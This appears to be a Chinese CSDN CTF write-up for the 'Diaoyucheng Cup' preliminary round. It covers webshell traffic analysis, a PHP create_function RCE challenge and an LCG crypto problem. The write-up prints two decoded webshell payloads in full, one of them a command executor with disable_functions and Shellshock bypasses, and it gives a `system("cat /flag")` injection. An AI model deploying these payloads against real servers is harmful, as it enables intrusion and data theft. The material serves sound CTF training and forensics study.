第三届“钓鱼城杯”网络安全技能大赛-初赛 部分WP

已于 2024-06-29 11:00:19 修改
阅读量727 收藏 16
点赞数 18
分类专栏: CTF--Misc CTF--Web 文章标签: 安全 网络安全 web安全 密码学
于 2024-06-29 03:08:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mutsa/article/details/140055639
版权

MISC

flow

1、用 Wireshark 打开解压后的文件,过滤出http的流量,逐个对请求和响应进行解码分析,发现该流量是先上传webshell,然后利用webshell进行攻击的流量

fc912fad0a8f4452904881d5596c000d.png

 2、在响应长度为709的流量中发现敏感文件flag.txt

b5edaf980bfe4914830f100891e9eb36.png

3、猜想下一步请求就是查看flag.txt文件内容,分析下一个请求

查看分组字节流

626250b4c2a84400899a9e83fc9cfb2e.png

f69479426da64dfd8458690f077d6756.png

放到CyberChef进行解码

adbdf4d411524d2f986c2a611edd86da.png

URL解码后,发现传递了三个参数air、jb4b82d0a4c3d5、o0cf98c06c2285

根据air参数可知道,需要对jb4b82d0a4c3d5的值进行base64解码

  • 对jb4b82d0a4c3d5的值进行base64解码后发现是PHP代码,复制到PhpStorm代码格式化
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
        if (!@is_writable($item)) continue;
        $tmdir = $item . "/.bec1c";
        @mkdir($tmdir);
        if (!@file_exists($tmdir))continue;
        $tmdir = realpath($tmdir);
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) @chdir("..");
        @ini_set("open_basedir", "/");
        @rmdir($tmdir);
        break;}}
function asenc($out){
    // 返回base64编码后的字符串
    return @base64_encode($out);
}
function asoutput(){
    // 读取缓冲区的内容
    $output = ob_get_contents();
    ob_end_clean();
    // 输出前置字符串
    echo "6cd90" . "8f25c4";
    // 输出base64编码后的内容
    echo @asenc($output);
    // 输出后置字符串
    echo "c50d" . "3d1e0";
}
ob_start();
try {
    // 接收o0cf98c06c2285参数,去掉前两个字符,然后base64解码
    $F = base64_decode(substr($_POST["o0cf98c06c2285"], 2));
    // 只读方式打开上面指定的文件
    $P = @fopen($F, "r");
    // 读取文件内容到缓冲区,如果文件大小小于4096就读取文件大小个字节,否则只读取4096个字节
    echo(@fread($P, filesize($F) ? filesize($F) : 4096));
    @fclose($P);;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

这里对关键代码进行标注

  • 对 o0cf98c06c2285解码(注意:要删除前两个字符

                 未删除前两个字符                                                  删除前两个字符 

 9f3c617fb2234a65bba1439d42fdfe15.png22c252ac853d4094ba08a0b232ae7962.png

结合上面分析,这里读取/Users/chang/Sites/air/flag.txt内容,那么接下来的响应包的内容就是flag.txt里面的内容进行base64编码加上前置字符串和后置字符串 

4、查看响应包内容

这里直接用Wireshark跳过前置字符串和后置字符串进行base64解码

8784d1c173714eb1b64f6adff2bbefa9.png

 可以发现解码后是看到7b和7d,分别对应字符 {} 的十六进制编码

5、 解码后得到flag

aff51abadd0843c5830ce5d5accb362e.png

简单流量 

1、用Wireshark打开解压后的文件,逐步分析http流量,发现也是webshell流量题

在长度为368的响应包发现敏感文件

abb027ad421a41f2ab2ff7b1495d66c5.png

直接提取下一个请求,解码后发现参数a明文传输了一段PHP代码,后面跟着传递了3个参数

4ce7324394da47a9acc78db94705062d.png

270fb5d1648a447d963828a3ae356e1e.png

将PHP代码放到PhpStorm里面格式化,简单分析

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split("/;|:/", $opdir);
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
        if (!@is_writable($item)) {
            continue;
        };
        $tmdir = $item . "/.cab8cb0";
        @mkdir($tmdir);
        if (!@file_exists($tmdir)) {
            continue;
        }
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) {
            @chdir("..");
        };
        @ini_set("open_basedir", "/");
        @rmdir($tmdir);
        break;
    };
};;
function asenc($out){
    return $out;
}

function asoutput(){
    $output = ob_get_contents();
    ob_end_clean();
    echo "2a77" . "01e3a";
    echo @asenc($output);
    echo "465c" . "e3a62";
}

ob_start();
try {
    $p = base64_decode(substr($_POST["ya7bc128230026"], 2));
    $s = base64_decode(substr($_POST["x77118dbf56718"], 2));
    $envstr = @base64_decode(substr($_POST["paf2bc7ed125d1"], 2));
    $d = dirname($_SERVER["SCRIPT_FILENAME"]);
    $c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"" : "/c \"{$s}\"";
    if (substr($d, 0, 1) == "/") {
        @putenv("PATH=" . getenv("PATH") . ":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
    } else {
        @putenv("PATH=" . getenv("PATH") . ";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
    }
    if (!empty($envstr)) {
        $envarr = explode("|||asline|||", $envstr);
        foreach ($envarr as $v) {
            if (!empty($v)) {
                @putenv(str_replace("|||askey|||", "=", $v));
            }
        }
    }
    $r = "{$p} {$c}";
    function fe($f)
    {
        $d = explode(",", @ini_get("disable_functions"));
        if (empty($d)) {
            $d = array();
        } else {
            $d = array_map('trim', array_map('strtolower', $d));
        }
        return (function_exists($f) && is_callable($f) && !in_array($f, $d));
    }
    function runshellshock($d, $c)
    {
        if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
            if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
                $tmp = tempnam(sys_get_temp_dir(), 'as');
                putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
                if (fe('error_log')) {
                    error_log("a", 1);
                } else {
                    mail("a@127.0.0.1", "", "", "-bv");
                }
            } else {
                return False;
            }
            $output = @file_get_contents($tmp);
            @unlink($tmp);
            if ($output != "") {
                print($output);
                return True;
            }
        }
        return False;
    }
    function runcmd($c)
    {
        $ret = 0;
        $d = dirname($_SERVER["SCRIPT_FILENAME"]);
        if (fe('system')) {
            @system($c, $ret);
        } elseif (fe('passthru')) {
            @passthru($c, $ret);
        } elseif (fe('shell_exec')) {
            print(@shell_exec($c));
        } elseif (fe('exec')) {
            @exec($c, $o, $ret);
            print(join("", $o));
        } elseif (fe('popen')) {
            $fp = @popen($c, 'r');
            while (!@feof($fp)) {
                print(@fgets($fp, 2048));
            }
            @pclose($fp);
        } elseif (fe('proc_open')) {
            $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
            while (!@feof($io[1])) {
                print(@fgets($io[1], 2048));
            }
            while (!@feof($io[2])) {
                print(@fgets($io[2], 2048));
            }
            @fclose($io[1]);
            @fclose($io[2]);
            @proc_close($p);
        } elseif (fe('antsystem')) {
            @antsystem($c);
        } elseif (runshellshock($d, $c)) {
            return $ret;
        } elseif (substr($d, 0, 1) != "/" && @class_exists("COM")) {
            $w = new COM('WScript.shell');
            $e = $w->exec($c);
            $so = $e->StdOut();
            $ret .= $so->ReadAll();
            $se = $e->StdErr();
            $ret .= $se->ReadAll();
            print($ret);
        } else {
            $ret = 127;
        }
        return $ret;
    }

    ;
    $ret = @runcmd($r . " 2>&1");
    print ($ret != 0) ? "ret={$ret}" : "";;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

关键代码

3f74378e610746839f9a10ad683e0bcc.png

81b47ef7460f4ccfa800654a706921d1.png423fe342961b4286a48e4e8c7c94b51e.png

大概意思就是可以将x77118dbf56718参数的值当作命令执行,并且把命令执行结果响应给前端

 在对后面参数解码

ab0507efd57c4b8b82216c152c4c8365.png

 74d93f85fbec47348d5c93491586233b.png

可以发现这个请求先切换了目录,然后输出前置字符,再执行pwd命令,最后输出后置字符串

查看响应包,发现输出结果和预期一致(注意:在参数a的PHP代码中也输出了前置字符串和后置字符串,执行命令时也输出了前置字符串和后置字符串,所以响应包前置字符串很长,后置字符串有两行)

8898d7f21be54482a1f148e80ecb2e45.png

2、依次分析接下来的请求和响应 

在长度为5228的请求中发现执行了输出flag.zip压缩文件的hex

5a6d1523598a4733b28e71700c3a7457.png

直接提取响应包的内容

0c42362193a8472a8dfa8b8208e3ee99.png

分析请求包,去掉多余的字符(前置字符串、后置字符串、pwd的命令结果输出) 

3、提取ZIP文件

另存为txt文件 

0baf9d506c6b48aa8da9271acf922f1c.png

打开010Editor导入十六进制

85c838ce5daf41848ac14915ba697838.png

另存为flag.zip 

10bff81d252946d780ec74103f627f50.png

解压缩发现要密码

d12aeeffc067430191f9a21d117965d7.png

4、继续分析流量,查找密码

 在最后一个请求中发现执行了解压缩命令,密码为P@sSw03d445f71fec5f84f2292e4bf9ac1a5103d.png

e6880adacd8b4909be0f51f7eb01668c.png

可以发现响应结果也是成功解压了,说明密码就是P@sSw03d 

5、解压文件得到flag

bb638e879f3d4cc5a659dfaadcbd3a94.png

WEB

不一样的rce

1、打开靶场查看源码发现弹窗,很明显前端用JavaScript对F12做了限制

14a98d88c6214e789f30870a2c15b064.png

打开火狐浏览器,禁用JavaScript,让浏览器不执行js代码

c8ab50b2894e42498ecba8fb2bb396fc.png

2、查看源码,提示爬虫协议 ,爬虫协议提示爬虫者哪些页面不能爬取

5c9884b8cfbb499bab5e9e47d6abdbad.png

3、查看robots.txt爬虫协议,发现ikun.php 

a64271c567254847a59f485e32d87461.png

4、打开ikun.php发现php代码 

204e5846d89c47539a7bad388a7efd8f.png

审计代码,接收4个参数,code和c0_de参数不强相等,sha1加密却相等,两个参数没有转为string,可以用数组绕过。看到$a('',$b);就应该想到create_function(),所以ctf=}system("cat /flag");/*,}与前面进行闭合,/*注释后面代码。das不能以字母和数字开头,可以用反斜杠\进行转义,对于普通字符\c转义后就是原字符c。ctf参数不能cat、ls等可以用base64编码绕过。 

d79734d145df4882902c868a70f5aa7e.png

查看根目录下发现flag和dflag,分别查看flag和dflag 

d31e95b46ce74552a7fcb1db6c55424a.png

 5、在dflag中发现flag,构造payload获取flag

61f72844169e45848e727fda1a55ddb7.png

Crypto

BabyLCG

1、打开文件查看代码

from secret import flag
from random import choice
from Crypto.Util.number import *
from base64 import *

base = choice([1, 2, 3])
if base == 1:
    flag = bytes_to_long(b16encode(flag))
elif base == 2:
    flag = bytes_to_long(b32encode(flag))
else:
    flag = bytes_to_long(b64encode(flag))


class LCG:
    def __init__(self, seed, multiplier, increment, modulus):
        self.state = seed
        self.multiplier = multiplier
        self.increment = increment
        self.modulus = modulus

    def up(self):
        self.state = (self.state * self.multiplier + self.increment) % self.modulus
        return self.state


LcG = LCG(flag, getPrime(512), getPrime(512), getPrime(512))
gift = []
for i in range(10):
    gift.append(LcG.up())
print('gift = ' + str(gift[7:]))
print('modulus = ' + str(LcG.modulus))

'''
gift = [6998668913539720854586318078964097924269535810376945153454874762880079122855229214946631470660390590416643009737549611992701041036474370166645418280901007, 
1892495848465417621576404191173925036164429140753793974334011134456947671358112732280576451200645683850307514019481657914071929753218355720294738264191434, 
4484145280982945455195043055386171233045034368064549769546029757634338455428186964514780286626949054244061700559656648067211088700781715028531671487463280]
modulus = 10450107588012697221920913365783869685974004783055148990692823980665238902913056762076796149418379728342781425496729735242364725136682283797430781849299753
'''

从1  2  3随机选一个数字赋值给base

如果base为1则对flag进行base16加密...

循环做10次lcg操作,输出最后三次随机数序列和模数

2、 发现是lcg算法(ctf之lcg算法_ctf lcg-CSDN博客

公式:eq?X_%7Bn&plus;1%7D%3D%28aX_%7Bn%7D&plus;b%29%5Cmod%20m

2acde43910a34bc7be2e0f280e3568fd.png

 3、分析代码(未知乘数a、增量b,已知模数m、随机数X 8,9,10)

根据后三个随机数序列反推前7个,从而反推出种子seed(也就是flag)

4、最终exp

from Crypto.Util.number import *
from gmpy2 import gmpy2
from base64 import *

m = 10450107588012697221920913365783869685974004783055148990692823980665238902913056762076796149418379728342781425496729735242364725136682283797430781849299753

x = [6998668913539720854586318078964097924269535810376945153454874762880079122855229214946631470660390590416643009737549611992701041036474370166645418280901007,
1892495848465417621576404191173925036164429140753793974334011134456947671358112732280576451200645683850307514019481657914071929753218355720294738264191434,
4484145280982945455195043055386171233045034368064549769546029757634338455428186964514780286626949054244061700559656648067211088700781715028531671487463280]

n = 0
# # 公式二求a
a = ((x[n + 2] - x[n + 1]) * gmpy2.invert((x[n + 1] - x[n]), m)) % m
# # 公式三求b
b = (x[n + 1] - a * x[n]) % m
# # 公式一求初始值
aa = gmpy2.invert(a, m)
pre_x = [aa * (x[n] - b) % m]

for i in range(10):
    pre_x.append(aa * (pre_x[i] - b) % m)

seed = long_to_bytes(pre_x[7]).decode()
print(seed)
# 由于对flag随机编码,所以需要尝试解码,如果解码失败报错会导致程序退出,所以需要try except捕获异常
try:print(b16decode(seed))
except:pass

try:print(b32decode(seed))
except:pass

try:print(b64decode(seed))
except:pass

 5、执行代码得到flag

71c96203919149539e1df328fcfeda70.png 

 

 

Mutsa
关注
  • 18
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【MISC】domainhacker2(第六届”蓝帽杯“全国大学生网络安全技能大赛
07-11
【MISC】domainhacker2 是一场比赛项目,源自第六届"蓝帽杯"全国大学生网络安全技能大赛。这个比赛旨在提升大学生在网络安全领域的实践能力和理论知识,促进网络安全技术的学习与交流。从提供的文件名来看,我们可以...
首届“钓鱼”杯网络安全技能大赛Web&PWN
m0_61155226的博客
05-05 382
首届“钓鱼”杯网络安全技能大赛WriteUP Web&PWN
蚁剑渗透测试
Lu__xiao的博客
01-15 3958
一、应用场景 对于本实验,我的理解是基于对方服务器存在文件上传漏洞,已经被上传一句话木马,这时我们通过蚁剑去做一个渗透攻击,目标是控制对方的服务器。 实验目标:1. 学会蚁剑的攻击方法; 2. 通过 Wireshark 抓取数据包进行分析; 本次实验需要一个攻击方和服务器 这里本机为服务器 IP地址:192.168.0.142 环境需求:phpstudy (模拟服务器)、Wireshark 抓包工具(进行抓宝分析) 虚拟机...
蚁剑流量分析
震山的博客
09-12 2050
蚁剑流量有何规则,也许看完这篇有所收获吧
第六届全国网络安全大赛 XDCTF 2015 线下某题.zip
04-19
网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。 网络安全不仅是个人的问题,也是国家安全的重要组成...
网络安全r-paper-mas笔记
06-06
网络安全是信息技术领域中的一个核心部分,它涉及到保护网络系统、数据和信息免受未经授权的访问、使用、披露、中断、修改或破坏。"网络安全r_paper-mas笔记"可能是一份详细记录了关于网络安全研究论文的笔记,特别...
通信网络安全与防护-课件-第4-6章-网络攻击技术、网络防护技术、网络安全协议PPT文档.pptx
11-13
它涵盖了物理安全、设备安全、通信线路安全、电源安全、路由器和交换机的安全配置、操作系统的安全、Web服务器的安全、物理和环境安全等多个方面。 物理安全是指保护机房、设备和通信线路免受物理破坏和未经授权的...
网络安全精品】8-ISC安全PPT.rar
04-23
网络安全是当今数字化世界中一个至关重要的议题,随着网络攻击的日益猖獗和复杂化,无论是企业还是个人用户,都迫切需要有效的安全措施来保护自己的数据和隐私。在此背景下,“8-ISC安全PPT.rar”这份资料应运而生,...
哪个邮箱最安全最好用啊
Zoho_Mail的博客
07-23 1410
Zoho企业邮箱,采用加密技术、反垃圾邮件和病毒保护,支持多因素认证,确保数据安全合规,同时提供易用性集成和移动应用。对公司,电子邮件可能带上商业计划、顾客信息、财务报表等保密信息,泄露可能导致竞争者掌握,危害企业的竞争优势与信誉。邮件炸弹进攻:很多垃圾短信的涌入可能导致邮箱服务器负荷,危害工作邮件的接收和推送,进而影响业务运作。登陆凭据、医疗记录、专利等敏感信息,一旦泄露,可能对个人或企业导致不可逆转的伤害。遵守国际安全标准和法规,如GDPR、HIPAA等,保证用户数据的合法处理和保护。
如何安全的申请SSL证书
2401_86337938的博客
07-22 1552
DV级别的证书只验证域名所有权,OV级别证书除了验证域名所有权外还会验证单位组织信息,EV级别的证书除了验证域名所有权、单位组织信息外还会验证详细组织业务信息。一旦你的证书被批准,你会收到一个包含证书文件的邮件。最后,在选择SSL证书时,也要注意选择受信任的可信根CA颁布的SSL证书,可以先向JoySSL官网工作人员发送自己需要保护的域名,提交自己所需要的证书类型,注册时填写。首先选择在授权的JoySSL提供商或者是受信任的证书颁发机构选择适合的证书类型。详细的公司信息验证,用于银行、电商等敏感行业。
日记审计遵守合规安全要求
m0_66268916的博客
07-24 512
它主要用于帮助组织实时监控与分析各种事件和行为的日志记录,以便检测潜在的安全威胁,了解系统性能和进行故障排除。它可以跟踪系统错误、异常行为和性能问题,使管理员能够迅速定位和解决潜在的技术故障,从而提高系统的可用性和性能。通过各种事件的归一化处理,实现高性能的海量事件存储和检索优化功能,提供高速的事件检索能力、事后的合规性统计分析处理,可对数据进行二次。支持全维度、跨设备、细粒度的关联分析,内置众多的关联规则,支持网络安全攻防检测、合规性检测,客户可轻松实现各资产间的关联分析。
数据库安全:MySQL安全配置,MySQL安全基线检查加固
wangyuxiang946的博客
07-23 2537
MySQL基线检查,基线配置,安全加固
科普文:Linux系统安全加固指南
最新发布
为无为,事无事,味无味。
07-25 1004
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
Internxt:适用于Linux开源安全云存储平台
ecscoupon的博客
07-24 1338
有无数的云存储平台为您的文件提供安全可靠的存储空间。可在 Linux 上安装的热门云存储应用程序包括Dropbox、Nextcloud和Google Drive,遗憾的是,后者迄今为止不提供 Linux 客户端。其他自托管选项包括OwnCloud、Pydio Cells、Seafile、Resilio和Syncthing。另一个值得尝试的开源云存储替代方案是Internxt。Internxt总部位于西班牙,是一家总部位于瓦伦西亚的初创公司,创始人为Fran Villalba Segarra。
鸿蒙仓颉语言之【安全密码库crypto4cj】功能示例
m0_70748845的博客
07-24 917
main() {return 0​很多开发朋友不知道需要学习那些鸿蒙技术?鸿蒙开发岗位需要掌握那些核心技术点?为此鸿蒙的开发学习必须要系统性的进行。而网上有关鸿蒙的开发资料非常的少,假如你想学好鸿蒙的应用开发与系统底层开发。你可以参考这份资料,少走很多弯路,节省没必要的麻烦。由两位前阿里高级研发工程师联合打造的《鸿蒙NEXT星河版OpenHarmony开发文档》里面内容包含了(
网站被浏览器提示“不安全”,如何解决
ABCDEFK1234的博客
07-24 601
网站被浏览器提示“不安全”,如何解决
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8352
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
《“微软蓝屏”敲响警钟:网络安全与系统稳定何去何从》
2302_77186925的博客
07-24 1737
“微软蓝屏”事件暴露了网络安全哪些问题
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值